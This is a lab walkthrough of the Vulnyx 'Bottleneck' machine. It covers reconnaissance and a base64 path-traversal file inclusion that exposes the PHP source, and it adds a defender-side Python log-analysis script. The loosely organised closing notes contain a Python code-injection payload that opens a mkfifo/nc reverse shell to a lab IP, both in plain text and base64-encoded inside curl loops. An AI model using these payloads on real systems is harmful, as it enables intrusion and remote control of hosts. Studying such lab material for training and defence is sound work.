Bottleneck - Vulnyx - Level: Medium - Report

Medium

Tools used

nmap
nikto
gobuster
wfuzz
feroxbuster
curl
base64

Reconnaissance

As the first step of the reconnaissance phase we use arp-scan to identify active hosts on the network. This lets us locate the target system quickly.

┌──(root㉿CCat)-[~]
└─# arp-scan -l
192.168.2.114 08:00:27:75:b3:f0 PCS Systemtechnik GmbH

Here we see the MAC address and the vendor of the network adapter. This can give further hints about the operating system or the type of device.

To resolve the hostname, we add the discovered host to the /etc/hosts file. This makes further work with the target easier, since we can use the hostname instead of the IP address.

┌──(root㉿CCat)-[~]
└─# echo "192.168.2.114 bottleneck.vln" >> /etc/hosts
┌──(root㉿CCat)-[~]
└─# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 CCat
192.168.2.114 bottleneck.vln

An entry in the /etc/hosts file makes it easier to identify the system.

The IP address used for scanning is: 192.168.2.114

Nmap is used to scan the target system for open ports and services.

Nmap IPv6 scan:
IPv6 address: fe80a00:27ff:fee2:95%eth0
┌──(root㉿CCat)-[~]
└─# nmap -6 -Pn fe80::a00:27ff:fe75:b3f0%eth0
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 22:37 CET
Nmap scan report for bottleneck (fe80::a00:27ff:fe75:b3f0)
Host is up (0.00038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:75:B3:F0 (Oracle VirtualBox virtual NIC)

Nmap scan report for fe80::d0a5:97c8:ee04:6f55
Host is up (0.0000060s latency).
All 65535 scanned ports on fe80::d0a5:97c8:ee04:6f55 are in ignored states.
Not shown: 65535 closed tcp ports (reset)

Nmap done: 2 IP addresses (2 hosts up) scanned in 16.98 seconds

The Nmap results show that SSH (port 22) and HTTP (port 80) are open.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000 | grep open
22/tcp open ssh OpenSSH 7.9p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx

This command runs a comprehensive Nmap scan to identify all open ports and their associated services on the target system.

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-31 22:37 CET
Nmap scan report for dc9.vln (192.168.2.114)
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 be:e0:d5:75:76:ea:d4:f3:91:77:f9:47:20:7d:bf:a4 (RSA)
| 256 7a:34:90:c0:59:d1:db:63:bd:4e:ca:5e:6f:ee:e7:2d (ECDSA)
|_ 256 c9:b9:66:ce:28:ad:b7:b3:d9:bb:ed:22:0d:e4:45:db (ED25519)
80/tcp open http nginx
|_http-title: BOTTLENECK
MAC Address: 08:00:27:75:B3:F0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.16 ms dc9.vln (192.168.2.114)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.03 seconds

The full Nmap output shows that SSH (port 22) and HTTP (port 80) are open. The SSH host keys and the HTTP Server header are also displayed.

Web Enumeration

Nikto is used to scan the web server for potential vulnerabilities and misconfigurations.

┌──(root㉿CCat)-[~]
└─# nikto -h 192.168.2.114
- Nikto v2.5.0

+ Target IP: 192.168.2.114
+ Target Hostname: 192.168.2.114
+ Target Port: 80
+ Start Time: 2024-10-31 22:38:14 (GMT1)

+ Server: nginx
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 3 item(s) reported on remote host
+ End Time: 2024-10-31 22:39:02 (GMT1) (48 seconds)

+ 1 host(s) tested

Nikto finds several points of interest: the missing anti-clickjacking (X-Frame-Options) and X-Content-Type-Options headers, and the file /#wp-config.php#.

Gobuster is used to find hidden directories and files on the web server.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.114/index.php (Status: 200) [Size: 10175]
http://192.168.2.114/img (Status: 301) [Size: 162] [--> http://192.168.2.114/img/]
http://192.168.2.114/css (Status: 301) [Size: 162] [--> http://192.168.2.114/css/]
http://192.168.2.114/js (Status: 301) [Size: 162] [--> http://192.168.2.114/js/]
http://192.168.2.114/vendor (Status: 301) [Size: 162] [--> http://192.168.2.114/vendor/]
http://192.168.2.114/image_gallery.php (Status: 200) [Size: 6381]

Gobuster finds the files index.php and image_gallery.php as well as the directories img, css, js and vendor.

The index.php page is retrieved with curl and its content displayed.

┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.114/index.php
-- shit, seriously matrix 4 is real? I'm scared.. --

-- Clients --
┌──(root㉿CCat)-[~]
└─# feroxbuster --url "http://192.168.2.114" --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .git,.php,.html,.xml,.zip,.7z,.tar,.bak,.sql,.py,.pl,.txt,.jpg,.jpeg,.png,.js,.aac,.ogg,.flac,.alac,.wav,.aiff,.dsd,.mp3,.mp4,.mkv,.phtml -s 200 301 302
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.2.114
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 301, 302]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [git, php, html, xml, zip, 7z, tar, bak, sql, py, pl, txt, jpg, jpeg, png, js, aac, ogg, flac, alac, wav, aiff, dsd, mp3, mp4, mkv, phtml]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301 GET 7l 11w 162c http://192.168.2.114/img => http://192.168.2.114/img/
200 GET 46l 159w 8557c http://192.168.2.114/img/about/4.jpg
200 GET 7l 989w 78635c http://192.168.2.114/vendor/bootstrap/js/bootstrap.bundle.min.js
200 GET 7l 1966w 155758c http://192.168.2.114/vendor/bootstrap/css/bootstrap.min.css
200 GET 25l 154w 12398c http://192.168.2.114/img/about/1.jpg
200 GET 2l 1276w 88145c http://192.168.2.114/vendor/jquery/jquery.min.js
200 GET 5l 83w 56517c http://192.168.2.114/vendor/fontawesome-free/css/all.min.css
200 GET 32l 147w 13088c http://192.168.2.114/img/about/3.jpg
200 GET 7l 75w 14784c http://192.168.2.114/img/beerpwn4.png
200 GET 42l 138w 1293c http://192.168.2.114/js/agency.js
200 GET 683l 1772w 15485c http://192.168.2.114/css/agency.css
200 GET 42l 189w 12855c http://192.168.2.114/img/vendetta.jpg
200 GET 1l 44w 2532c http://192.168.2.114/vendor/jquery-easing/jquery.easing.min.js
200 GET 52l 278w 27787c http://192.168.2.114/img/about/2.jpg
200 GET 272l 729w 10175c http://192.168.2.114/
200 GET 272l 729w 10175c http://192.168.2.114/index.php
301 GET 7l 11w 162c http://192.168.2.114/img/about => http://192.168.2.114/img/about/
301 GET 7l 11w 162c http://192.168.2.114/css => http://192.168.2.114/css/
301 GET 7l 11w 162c http://192.168.2.114/js => http://192.168.2.114/js/
301 GET 7l 11w 162c http://192.168.2.114/vendor => http://192.168.2.114/vendor/
301 GET 7l 11w 162c http://192.168.2.114/vendor/bootstrap => http://192.168.2.114/vendor/bootstrap/
200 GET 168l 348w 6381c http://192.168.2.114/image_gallery.php
301 GET 7l 11w 162c http://192.168.2.114/vendor/bootstrap/css => http://192.168.2.114/vendor/bootstrap/css/
301 GET 7l 11w 162c http://192.168.2.114/vendor/bootstrap/js => http://192.168.2.114/vendor/bootstrap/js/
301 GET 7l 11w 162c http://192.168.2.114/vendor/jquery => http://192.168.2.114/vendor/jquery/
[#>--] - 17m 15967167/61753664 51m found:25 errors:5322
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_192_168_2_114-1730412809.state ...
[#>--] - 17m 15967673/61753664 51m found:25 errors:5322
[>-] - 17m 2119740/6175288 2131/s http://192.168.2.114/
[>-] - 17m 2145724/6175288 2158/s http://192.168.2.114/img/
[>-] - 17m 2152808/6175288 2165/s http://192.168.2.114/img/about/
[>-] - 17m 2104564/6175288 2121/s http://192.168.2.114/css/
[>-] - 16m 2087064/6175288 2109/s http://192.168.2.114/js/
[>-] - 16m 2111452/6175288 2142/s http://192.168.2.114/vendor/
[#>-] - 10m 1055208/6175288 1694/s http://192.168.2.114/vendor/bootstrap/
[#>-] - 10m 1006432/6175288 1635/s http://192.168.2.114/vendor/bootstrap/css/
[#>-] - 10m 1000328/6175288 1639/s http://192.168.2.114/vendor/bootstrap/js/
[>-] - 3m 250096/6175288 1363/s http://192.168.2.114/vendor/jquery/

Initial Access

The request parameters of image_gallery.php are inspected.

http://192.168.2.114/image_gallery.php?t=1730412411&f=Ym90dGxlbmVja19kb250YmUucG5n
https://www.base64decode.org/

The base64 string is decoded.

Ym90dGxlbmVja19kb250YmUucG5n
bottleneck_dontbe.png

Privilege Escalation

http://192.168.2.114/image_gallery.php?t=1730412411&f=aWQ=
┌──(root㉿CCat)-[~]
└─# curl http://192.168.2.114/img/bottleneck_dontbe.png -sI
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 31 Oct 2024 22:15:42 GMT
Content-Type: image/png
Content-Length: 27683
Last-Modified: Mon, 23 Sep 2019 21:24:46 GMT
Connection: keep-alive
ETag: "5d89381e-6c23"
Accept-Ranges: bytes
https://www.confirado.de/tools/timestamp-umrechner.html
Convert a Unix timestamp to a date
The timestamp 1730412411 corresponds to 31.10.2024 at 23:06:51.
(valid for UTC+1)
31.10.2024 at 23:35:00 corresponds to the timestamp 1730414100.
(valid for UTC+1)
┌──(root㉿CCat)-[~]
└─# curl -s "http://192.168.2.114/image_gallery.php?t=1730414160&f=L2V0Yy9wYXNzd2Q="
Let me throw away your nice request into the bin.
The SOC was informed about your attempt to break into this site. Thanks to previous attackers
effort in smashing my infrastructructure I will take strong legal measures.
Why don't you wait on your chair until someone (maybe the police) knock on your door?

_,..._
/__ \
>< `. \
/_ \ |
\-_ /:|
,--'..'. :
,' `.
_,' \
_.._,--'' , |
, ,',, _| _,.'| | |
\||/,'(,' '--'' | | |
_ ||| | /-' |
| | (- -)<`._ | / /
| | \_\/_/`-.(<< |____/ /
| | / \ / -'| `--.'|
| | \___/ / /
| | H H / | |
|_|_..-H-H--.._ / ,| |
|-.._"_"__..-| | _-/ | |
| | | | \_ |
| | | | | |
| | |____| | |
| | _..' | |____|
| |_(____..._' _.' |
`-..______..-'"" (___..--'
┌──(root㉿CCat)-[~]
└─# for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730414640&f=L2V0Yy9wYXNzd2Q=";echo $i;done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Let me throw away your nice request into the bin.
The SOC was informed about your attempt to break into this site. Thanks to previous attackers
effort in smashing my infrastructructure I will take strong legal measures.
Why don't you wait on your chair until someone (maybe the police) knock on your door?
16
passwd does not work...
Payload = ../../../../../../../../../../image_gallery.php >> Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vaW1hZ2VfZ2FsbGVyeS5waHA=
Payload = ../image_gallery.php >> Li4vaW1hZ2VfZ2FsbGVyeS5waHA=
┌──(root㉿CCat)-[~]
└─# for i in {1..80}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730415090&f=Li4vaW1hZ2VfZ2FsbGVyeS5waHA=";echo $i;done

CHANGELOG
v1.1: Still testing without content.
I've fixed that problem that @p4w and @ska notified me after hacker attack.
Shit I'm too lazy to make a big review of my code.
I think that the LFI problem can be mitigated with the blacklist.
By the way to protect me from attackers, all malicious requests are immediately sent to the SOC

v1.0: Starting this beautiful gallery

$tstamp = time();
if(isset($_GET['t']) && isset($_GET['f'])){

include_once 'image_gallery_load.php';

exit();
}
Payload = ../image_gallery_load.php >> Li4vaW1hZ2VfZ2FsbGVyeV9sb2FkLnBocA
┌──(root㉿CCat)-[~]
└─# for i in {1..80}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730415510&f=Li4vaW1hZ2VfZ2FsbGVyeV9sb2FkLnBocA";echo $i;done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
function print_troll(){
$messages = $GLOBALS['messages'];
$troll = $GLOBALS['troll'];
echo $messages[0];
echo $troll;
}

$troll = <<<EOT
_,..._
/__ \
>< `. \
/_ \ |
\-_ /:|
,--'..'. :
,' `.
_,' \
_.._,--'' , |
, ,',, _| _,.'| | |
\\||/,'(,' '--'' | | |
_ ||| | /-' |
| | (- -)<`._ | / /
| | \_\/_/`-.(<< |____/ /
| | / \ / -'| `--.'|
| | \___/ / /
| | H H / | |
|_|_..-H-H--.._ / ,| |
|-.._"_"__..-| | _-/ | |
| | | | \_ |
| | | | | |
| | |____| | |
| | _..' | |____|
| |_(____..._' _.' |
`-..______..-'"" (___..--'

EOT;

if(!isset($_GET['t']) || !isset($_GET['f'])){
exit();
}

$imagefile = base64_decode($_GET['f']);
$timestamp = time();
$isblocked = FALSE;
$blacklist = array('/etc','/opt','/var','/opt','/proc','/dev','/lib','/bin','/usr','/home','/ids');
$messages = array("\nLet me throw away your nice request into the bin.\n".
"The SOC was informed about your attempt to break into this site. Thanks to previous attackers effort in smashing my infrastructructure I will take strong legal measures.\n".
"Why don't you wait on your chair until someone (maybe the police) knock on your door?\n\n");

if(abs($_GET['t'] - $timestamp) > 10){
exit();
}
foreach($blacklist as $elem){
if(strstr($imagefile, $elem) !== FALSE)
$isblocked = TRUE;
}
// report the intrusion to the soc and save information locally for further investigation
if($isblocked){
$logfile = 'intrusion_'.$timestamp;
$fp = fopen('/var/log/soc/'.$logfile, 'w');
fwrite($fp, "'".$imagefile."'");
fclose($fp);
exec('python /opt/ids_strong_bvb.py /tmp/output 2>&1');
print_troll();
exit();
}
chdir('img');
$filecontent = file_get_contents($imagefile);
if($filecontent === FALSE){
print_troll();
}
else{
echo $filecontent;
}
chdir('../');

?>
18
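As an added defender-side example (not code from the original write-up or from the Vulnyx VM), the following Python script reproduces the substring blacklist from image_gallery_load.php, decodes the base64 f parameter from constructed nginx access-log lines, and contrasts the blacklist with a path-containment check; the image directory /var/www/html/img and the log lines are assumptions.

```python
import base64
import os
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample nginx access-log lines (not real traffic), modelled on the
# requests in the walkthrough: a normal image, an absolute /etc/passwd path that
# the blacklist catches, and a relative traversal that slips past it.
SAMPLE_LOG = """\
192.168.2.199 - - [31/Oct/2024:23:06:51 +0100] "GET /image_gallery.php?t=1730412411&f=Ym90dGxlbmVja19kb250YmUucG5n HTTP/1.1" 200 27683
192.168.2.199 - - [31/Oct/2024:23:36:00 +0100] "GET /image_gallery.php?t=1730414160&f=L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 1712
192.168.2.199 - - [31/Oct/2024:23:51:31 +0100] "GET /image_gallery.php?t=1730415090&f=Li4vaW1hZ2VfZ2FsbGVyeS5waHA= HTTP/1.1" 200 8231
"""

# Same substring blacklist as the PHP on the page (its duplicate '/opt' dropped).
BLACKLIST = ('/etc', '/opt', '/var', '/proc', '/dev', '/lib', '/bin', '/usr', '/home', '/ids')
IMG_DIR = '/var/www/html/img'   # assumed layout; the page only shows chdir('img')

LOG_RE = re.compile(r'"GET (?P<path>\S+) HTTP/')

def decode_f(raw):
    """PHP's base64_decode() accepts missing '=' padding; mimic that here."""
    raw = raw + '=' * (-len(raw) % 4)
    return base64.b64decode(raw).decode('utf-8', errors='replace')

def blacklist_blocks(path):
    """strstr()-style check from the page: a listed prefix anywhere in the string."""
    return any(elem in path for elem in BLACKLIST)

def containment_blocks(path, base=IMG_DIR):
    """Hardened check: resolve relative to img/ and require the result to stay inside."""
    resolved = os.path.normpath(os.path.join(base, path))
    return not (resolved == base or resolved.startswith(base + os.sep))

def analyse(log_text):
    """One dict per request: decoded file name and whether each check would stop it.
    Note: a '+' in the base64 value must be URL-encoded as %2B, or parse_qs turns it into a space."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        qs = parse_qs(urlparse(m.group('path')).query)
        if 'f' not in qs:
            continue
        decoded = decode_f(qs['f'][0])
        findings.append({'decoded': decoded,
                         'blacklist': blacklist_blocks(decoded),
                         'containment': containment_blocks(decoded)})
    return findings

if __name__ == '__main__':
    for f in analyse(SAMPLE_LOG):
        print(f"{f['decoded']!r:32} blacklist={f['blacklist']!s:5} containment={f['containment']}")
```

Only the third request, the relative traversal to a sibling PHP file, passes the blacklist while the containment check rejects it.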
../etc/passwd' and __import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 9001 >/tmp/f") and ' ../../../../../tmp/output
../etc/passwd' and __import__(\"os\").system(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.2.199 9001 >/tmp/f\") and '
1730329230
for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t= ";echo $i;done
for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730414160&f=L2V0Yy9wYXNzd2Q=";echo $i;done
1730330730
for i in {1..30}; do sleep 1s;curl -s "http://192.168.2.114/image_gallery.php?t=1730330960&f=Li4vZXRjL3Bhc3N3ZCcgYW5kIF9faW1wb3J0X18oIm9zIikuc3lzdGVtKCJybSAvdG1wL2Y7bWtmaWZvIC90bXAvZjtjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxOTIuMTY4LjIuMTk5IDQ0NDQgPi90bXAvZiIpIGFuZCAn";echo $i;done

Flags

cat user.txt userflag
cat root.txt rootflag